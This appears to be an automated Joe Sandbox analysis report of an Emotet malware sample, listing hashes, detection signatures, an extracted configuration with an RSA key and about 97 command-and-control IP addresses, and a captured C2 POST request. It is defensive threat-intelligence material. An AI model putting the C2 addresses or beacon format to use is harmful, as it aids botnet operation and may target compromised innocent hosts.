Edit tour

Windows Analysis Report
ExeFile (360).exe

Overview

General Information

Sample name:	ExeFile (360).exe
Analysis ID:	1495906
MD5:	8e2bdd409a89cbb6b5eb424e9d1bda34
SHA1:	f8e82cca5dbb430bafd16b516f6e97cdb754ba72
SHA256:	297556d0ee81785209ae8464a2e8665271dfb03b2d321531d7d82804549b54e6
Tags:	EmotetHeodo
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Emotet

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Uses known network protocols on non-standard ports

Connects to several IPs in different countries

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains executable resources (Code or Archives)

Potential key logger detected (key state polling based)

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Desusertion Ports

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ExeFile (360).exe (PID: 1376 cmdline: "C:\Users\user\Desktop\ExeFile (360).exe" MD5: 8E2BDD409A89CBB6B5EB424E9D1BDA34)

provthrd.exe (PID: 6952 cmdline: "C:\Windows\SysWOW64\dllhost\provthrd.exe" MD5: 8E2BDD409A89CBB6B5EB424E9D1BDA34)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Emotet	While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.	GOLD CABIN MUMMY SPIDER Mealybug	http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1 http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/ http://ropgadget.com/posts/defensive_pcres.html https://adalogics.com/blog/the-state-of-advanced-code-injections https://asec.ahnlab.com/en/33600/	https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["74.219.172.26:80", "134.209.36.254:8080", "104.156.59.7:8080", "120.138.30.150:8080", "194.187.133.160:443", "104.236.246.93:8080", "74.208.45.104:8080", "78.187.156.31:80", "187.161.206.24:80", "94.23.216.33:80", "172.91.208.86:80", "91.211.88.52:7080", "50.91.114.38:80", "200.123.150.89:443", "121.124.124.40:7080", "62.75.141.82:80", "5.196.74.210:8080", "24.137.76.62:80", "85.105.205.77:8080", "139.130.242.43:80", "82.225.49.121:80", "110.145.77.103:80", "195.251.213.56:80", "46.105.131.79:8080", "87.106.136.232:8080", "75.139.38.211:80", "124.41.215.226:80", "203.153.216.189:7080", "162.241.242.173:8080", "219.74.18.66:443", "174.45.13.118:80", "68.188.112.97:80", "200.114.213.233:8080", "213.196.135.145:80", "61.92.17.12:80", "61.19.246.238:443", "219.75.128.166:80", "120.150.60.189:80", "123.176.25.234:80", "1.221.254.82:80", "137.119.36.33:80", "94.23.237.171:443", "74.120.55.163:80", "62.30.7.67:443", "104.131.11.150:443", "139.59.67.118:443", "209.141.54.221:8080", "79.137.83.50:443", "84.39.182.7:80", "97.82.79.83:80", "87.106.139.101:8080", "94.1.108.190:443", "37.187.72.193:8080", "139.162.108.71:8080", "93.147.212.206:80", "74.134.41.124:80", "103.86.49.11:8080", "75.80.124.4:80", "109.74.5.95:8080", "153.232.188.106:80", "168.235.67.138:7080", "50.35.17.13:80", "42.200.107.142:80", "82.80.155.43:80", "78.24.219.147:8080", "24.43.99.75:80", "107.5.122.110:80", "156.155.166.221:80", "83.169.36.251:8080", "47.144.21.12:443", "79.98.24.39:8080", "181.169.34.190:80", "139.59.60.244:8080", "85.152.162.105:80", "185.94.252.104:443", "110.5.16.198:80", "174.102.48.180:443", "140.186.212.146:80", "95.179.229.244:8080", "104.32.141.43:80", "169.239.182.217:8080", "121.7.127.163:80", "94.200.114.161:80", "201.173.217.124:443", "104.131.44.150:8080", "137.59.187.107:8080", "5.39.91.110:7080", "203.117.253.142:80", "157.245.99.39:8080", "176.111.60.55:8080", "95.213.236.64:8080", "220.245.198.194:80", "37.139.21.175:8080", "89.216.122.92:80", "139.99.158.11:443", "24.179.13.119:80", "188.219.31.12:80"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x2d6c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x31dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x2d6c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x590a:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x590a:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x31dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ExeFile (360).exe.54279e.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.ExeFile (360).exe.54279e.1.raw.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
0.2.ExeFile (360).exe.690000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.ExeFile (360).exe.690000.3.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
2.2.provthrd.exe.8c279e.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.provthrd.exe.8c279e.2.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x256c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
0.2.ExeFile (360).exe.54279e.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.ExeFile (360).exe.54052e.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.ExeFile (360).exe.54279e.1.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x256c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
0.2.ExeFile (360).exe.54052e.2.raw.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x53dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
2.2.provthrd.exe.900000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.provthrd.exe.900000.3.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
2.2.provthrd.exe.8c279e.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.provthrd.exe.8c279e.2.raw.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
2.2.provthrd.exe.8c052e.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.provthrd.exe.8c052e.1.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x35dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
2.2.provthrd.exe.8c052e.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.provthrd.exe.8c052e.1.raw.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x53dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
0.2.ExeFile (360).exe.54052e.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.ExeFile (360).exe.54052e.2.unpack	Windows_Trojan_Emotet_5528b3b0	unknown	unknown	0x35dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Communication To Uncommon Desusertion Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DesusertionIp: 134.209.36.254, DesusertionIsIpv6: false, DesusertionPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\dllhost\provthrd.exe, Initiated: true, ProcessId: 6952, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49717

Suricata Signatures

ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 - Source IP: 192.168.2.9 - Destination IP: 172.91.208.86

Timestamp:	2024-08-20T17:48:31.137316+0200
SID:	2854388
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 - Source IP: 192.168.2.9 - Destination IP: 194.187.133.160

Timestamp:	2024-08-20T17:46:36.956983+0200
SID:	2854388
Severity:	1
Source Port:	49720
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 - Source IP: 192.168.2.9 - Destination IP: 94.23.216.33

Timestamp:	2024-08-20T17:48:06.769237+0200
SID:	2854388
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 - Source IP: 192.168.2.9 - Destination IP: 187.161.206.24

Timestamp:	2024-08-20T17:48:02.355840+0200
SID:	2854388
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 - Source IP: 192.168.2.9 - Destination IP: 78.187.156.31

Timestamp:	2024-08-20T17:47:38.403788+0200
SID:	2854388
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ExeFile (360).exe

Avira: detected

Found malware configuration

Source: 2.2.provthrd.exe.8c279e.2.raw.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["74.219.172.26:80", "134.209.36.254:8080", "104.156.59.7:8080", "120.138.30.150:8080", "194.187.133.160:443", "104.236.246.93:8080", "74.208.45.104:8080", "78.187.156.31:80", "187.161.206.24:80", "94.23.216.33:80", "172.91.208.86:80", "91.211.88.52:7080", "50.91.114.38:80", "200.123.150.89:443", "121.124.124.40:7080", "62.75.141.82:80", "5.196.74.210:8080", "24.137.76.62:80", "85.105.205.77:8080", "139.130.242.43:80", "82.225.49.121:80", "110.145.77.103:80", "195.251.213.56:80", "46.105.131.79:8080", "87.106.136.232:8080", "75.139.38.211:80", "124.41.215.226:80", "203.153.216.189:7080", "162.241.242.173:8080", "219.74.18.66:443", "174.45.13.118:80", "68.188.112.97:80", "200.114.213.233:8080", "213.196.135.145:80", "61.92.17.12:80", "61.19.246.238:443", "219.75.128.166:80", "120.150.60.189:80", "123.176.25.234:80", "1.221.254.82:80", "137.119.36.33:80", "94.23.237.171:443", "74.120.55.163:80", "62.30.7.67:443", "104.131.11.150:443", "139.59.67.118:443", "209.141.54.221:8080", "79.137.83.50:443", "84.39.182.7:80", "97.82.79.83:80", "87.106.139.101:8080", "94.1.108.190:443", "37.187.72.193:8080", "139.162.108.71:8080", "93.147.212.206:80", "74.134.41.124:80", "103.86.49.11:8080", "75.80.124.4:80", "109.74.5.95:8080", "153.232.188.106:80", "168.235.67.138:7080", "50.35.17.13:80", "42.200.107.142:80", "82.80.155.43:80", "78.24.219.147:8080", "24.43.99.75:80", "107.5.122.110:80", "156.155.166.221:80", "83.169.36.251:8080", "47.144.21.12:443", "79.98.24.39:8080", "181.169.34.190:80", "139.59.60.244:8080", "85.152.162.105:80", "185.94.252.104:443", "110.5.16.198:80", "174.102.48.180:443", "140.186.212.146:80", "95.179.229.244:8080", "104.32.141.43:80", "169.239.182.217:8080", "121.7.127.163:80", "94.200.114.161:80", "201.173.217.124:443", "104.131.44.150:8080", "137.59.187.107:8080", "5.39.91.110:7080", "203.117.253.142:80", "157.245.99.39:8080", "176.111.60.55:8080", "95.213.236.64:8080", "220.245.198.194:80", "37.139.21.175:8080", "89.216.122.92:80", "139.99.158.11:443", "24.179.13.119:80", "188.219.31.12:80"]}

Multi AV Scanner detection for submitted file

Source: ExeFile (360).exe

ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.7% probability

Machine Learning detection for sample

Source: ExeFile (360).exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00403690 CryptAcquireContextA,CryptAcquireContextA,	0_2_00403690
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00403690 CryptAcquireContextA,CryptAcquireContextA,	2_2_00403690
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00902210 CryptDestroyHash,CryptExportKey,CryptDuplicateHash,CryptGetHashParam,CryptEncrypt,memcpy,GetProcessHeap,HeapFree,	2_2_00902210
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_009025A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,	2_2_009025A0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00901FA0 CryptDuplicateHash,CryptDestroyHash,memcpy,	2_2_00901FA0

Source: ExeFile (360).exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004366D0 FindFirstFileA,FindClose,	0_2_004366D0
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004356B4 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_004356B4
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_006938B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,	0_2_006938B0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004366D0 FindFirstFileA,FindClose,	2_2_004366D0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004356B4 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	2_2_004356B4
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_009038B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,	2_2_009038B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49737 -> 94.23.216.33:80
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49737 -> 94.23.216.33:80
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49738 -> 172.91.208.86:80
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49738 -> 172.91.208.86:80
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49732 -> 187.161.206.24:80
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49732 -> 187.161.206.24:80
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49723 -> 78.187.156.31:80
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49723 -> 78.187.156.31:80
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49718 -> 104.156.59.7:8080
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49717 -> 134.209.36.254:8080
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49721 -> 104.236.246.93:8080
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49721 -> 104.236.246.93:8080
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49739 -> 91.211.88.52:7080
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49719 -> 120.138.30.150:8080
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49719 -> 120.138.30.150:8080
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49707 -> 74.219.172.26:80
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49707 -> 74.219.172.26:80
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49722 -> 74.208.45.104:8080
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49722 -> 74.208.45.104:8080
Source: Network traffic	Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.9:49720 -> 194.187.133.160:443
Source: Network traffic	Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.9:49720 -> 194.187.133.160:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 74.219.172.26:80
Source: Malware configuration extractor	IPs: 134.209.36.254:8080
Source: Malware configuration extractor	IPs: 104.156.59.7:8080
Source: Malware configuration extractor	IPs: 120.138.30.150:8080
Source: Malware configuration extractor	IPs: 194.187.133.160:443
Source: Malware configuration extractor	IPs: 104.236.246.93:8080
Source: Malware configuration extractor	IPs: 74.208.45.104:8080
Source: Malware configuration extractor	IPs: 78.187.156.31:80
Source: Malware configuration extractor	IPs: 187.161.206.24:80
Source: Malware configuration extractor	IPs: 94.23.216.33:80
Source: Malware configuration extractor	IPs: 172.91.208.86:80
Source: Malware configuration extractor	IPs: 91.211.88.52:7080
Source: Malware configuration extractor	IPs: 50.91.114.38:80
Source: Malware configuration extractor	IPs: 200.123.150.89:443
Source: Malware configuration extractor	IPs: 121.124.124.40:7080
Source: Malware configuration extractor	IPs: 62.75.141.82:80
Source: Malware configuration extractor	IPs: 5.196.74.210:8080
Source: Malware configuration extractor	IPs: 24.137.76.62:80
Source: Malware configuration extractor	IPs: 85.105.205.77:8080
Source: Malware configuration extractor	IPs: 139.130.242.43:80
Source: Malware configuration extractor	IPs: 82.225.49.121:80
Source: Malware configuration extractor	IPs: 110.145.77.103:80
Source: Malware configuration extractor	IPs: 195.251.213.56:80
Source: Malware configuration extractor	IPs: 46.105.131.79:8080
Source: Malware configuration extractor	IPs: 87.106.136.232:8080
Source: Malware configuration extractor	IPs: 75.139.38.211:80
Source: Malware configuration extractor	IPs: 124.41.215.226:80
Source: Malware configuration extractor	IPs: 203.153.216.189:7080
Source: Malware configuration extractor	IPs: 162.241.242.173:8080
Source: Malware configuration extractor	IPs: 219.74.18.66:443
Source: Malware configuration extractor	IPs: 174.45.13.118:80
Source: Malware configuration extractor	IPs: 68.188.112.97:80
Source: Malware configuration extractor	IPs: 200.114.213.233:8080
Source: Malware configuration extractor	IPs: 213.196.135.145:80
Source: Malware configuration extractor	IPs: 61.92.17.12:80
Source: Malware configuration extractor	IPs: 61.19.246.238:443
Source: Malware configuration extractor	IPs: 219.75.128.166:80
Source: Malware configuration extractor	IPs: 120.150.60.189:80
Source: Malware configuration extractor	IPs: 123.176.25.234:80
Source: Malware configuration extractor	IPs: 1.221.254.82:80
Source: Malware configuration extractor	IPs: 137.119.36.33:80
Source: Malware configuration extractor	IPs: 94.23.237.171:443
Source: Malware configuration extractor	IPs: 74.120.55.163:80
Source: Malware configuration extractor	IPs: 62.30.7.67:443
Source: Malware configuration extractor	IPs: 104.131.11.150:443
Source: Malware configuration extractor	IPs: 139.59.67.118:443
Source: Malware configuration extractor	IPs: 209.141.54.221:8080
Source: Malware configuration extractor	IPs: 79.137.83.50:443
Source: Malware configuration extractor	IPs: 84.39.182.7:80
Source: Malware configuration extractor	IPs: 97.82.79.83:80
Source: Malware configuration extractor	IPs: 87.106.139.101:8080
Source: Malware configuration extractor	IPs: 94.1.108.190:443
Source: Malware configuration extractor	IPs: 37.187.72.193:8080
Source: Malware configuration extractor	IPs: 139.162.108.71:8080
Source: Malware configuration extractor	IPs: 93.147.212.206:80
Source: Malware configuration extractor	IPs: 74.134.41.124:80
Source: Malware configuration extractor	IPs: 103.86.49.11:8080
Source: Malware configuration extractor	IPs: 75.80.124.4:80
Source: Malware configuration extractor	IPs: 109.74.5.95:8080
Source: Malware configuration extractor	IPs: 153.232.188.106:80
Source: Malware configuration extractor	IPs: 168.235.67.138:7080
Source: Malware configuration extractor	IPs: 50.35.17.13:80
Source: Malware configuration extractor	IPs: 42.200.107.142:80
Source: Malware configuration extractor	IPs: 82.80.155.43:80
Source: Malware configuration extractor	IPs: 78.24.219.147:8080
Source: Malware configuration extractor	IPs: 24.43.99.75:80
Source: Malware configuration extractor	IPs: 107.5.122.110:80
Source: Malware configuration extractor	IPs: 156.155.166.221:80
Source: Malware configuration extractor	IPs: 83.169.36.251:8080
Source: Malware configuration extractor	IPs: 47.144.21.12:443
Source: Malware configuration extractor	IPs: 79.98.24.39:8080
Source: Malware configuration extractor	IPs: 181.169.34.190:80
Source: Malware configuration extractor	IPs: 139.59.60.244:8080
Source: Malware configuration extractor	IPs: 85.152.162.105:80
Source: Malware configuration extractor	IPs: 185.94.252.104:443
Source: Malware configuration extractor	IPs: 110.5.16.198:80
Source: Malware configuration extractor	IPs: 174.102.48.180:443
Source: Malware configuration extractor	IPs: 140.186.212.146:80
Source: Malware configuration extractor	IPs: 95.179.229.244:8080
Source: Malware configuration extractor	IPs: 104.32.141.43:80
Source: Malware configuration extractor	IPs: 169.239.182.217:8080
Source: Malware configuration extractor	IPs: 121.7.127.163:80
Source: Malware configuration extractor	IPs: 94.200.114.161:80
Source: Malware configuration extractor	IPs: 201.173.217.124:443
Source: Malware configuration extractor	IPs: 104.131.44.150:8080
Source: Malware configuration extractor	IPs: 137.59.187.107:8080
Source: Malware configuration extractor	IPs: 5.39.91.110:7080
Source: Malware configuration extractor	IPs: 203.117.253.142:80
Source: Malware configuration extractor	IPs: 157.245.99.39:8080
Source: Malware configuration extractor	IPs: 176.111.60.55:8080
Source: Malware configuration extractor	IPs: 95.213.236.64:8080
Source: Malware configuration extractor	IPs: 220.245.198.194:80
Source: Malware configuration extractor	IPs: 37.139.21.175:8080
Source: Malware configuration extractor	IPs: 89.216.122.92:80
Source: Malware configuration extractor	IPs: 139.99.158.11:443
Source: Malware configuration extractor	IPs: 24.179.13.119:80
Source: Malware configuration extractor	IPs: 188.219.31.12:80

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49739 -> 7080

Source: unknown

Network traffic detected: IP country count 32

Source: global traffic	TCP traffic: 192.168.2.9:49717 -> 134.209.36.254:8080
Source: global traffic	TCP traffic: 192.168.2.9:49718 -> 104.156.59.7:8080
Source: global traffic	TCP traffic: 192.168.2.9:49719 -> 120.138.30.150:8080
Source: global traffic	TCP traffic: 192.168.2.9:49721 -> 104.236.246.93:8080
Source: global traffic	TCP traffic: 192.168.2.9:49722 -> 74.208.45.104:8080
Source: global traffic	TCP traffic: 192.168.2.9:49739 -> 91.211.88.52:7080

Source: Joe Sandbox View	IP Address: 94.200.114.161 94.200.114.161
Source: Joe Sandbox View	IP Address: 85.152.162.105 85.152.162.105
Source: Joe Sandbox View	IP Address: 174.102.48.180 174.102.48.180

Source: Joe Sandbox View	ASN Name: DU-AS1AE DU-AS1AE
Source: Joe Sandbox View	ASN Name: TELECABLESpainES TELECABLESpainES
Source: Joe Sandbox View	ASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox View	ASN Name: xneeloZA xneeloZA

Source: global traffic	HTTP traffic detected: POST /8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.219.172.26/8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------nSkemeWNWaOePnS4Host: 74.219.172.26Content-Length: 4644Cache-Control: no-cache
